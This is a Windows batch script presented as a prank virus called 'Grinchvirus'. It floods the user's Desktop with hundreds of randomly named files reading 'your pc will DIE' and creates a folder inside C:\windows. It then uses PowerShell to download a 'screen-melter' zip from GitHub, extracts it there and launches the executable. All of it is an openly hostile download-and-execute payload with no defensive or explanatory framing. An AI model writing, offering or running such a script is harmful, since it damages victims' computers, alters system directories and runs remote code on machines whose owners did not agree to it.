@echo off
cd
cd..
cd users
cd %username%
cd Desktop
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
echo your pc will DIE > %random%.txt
cd..
cd..
cd..
cd..
cd..
cd..
cd..
cd..
cd..
cd windows
mkdir Grinchvirus
cd Grinchvirus
powershell -c Start-BitsTransfer -Source https://github.com/weyh/screen-melter/releases/download/v1.2.0/screen-melter_x64_v1.2.0.zip -Destination c:\windows\Grinchvirus
powershell -c Expand-Archive -Path c:\windows\Grinchvirus\screen-melter_x64_v1.2.0.zip -DestinationPath c:\windows\Grinchvirus\
start screen-melter.exe
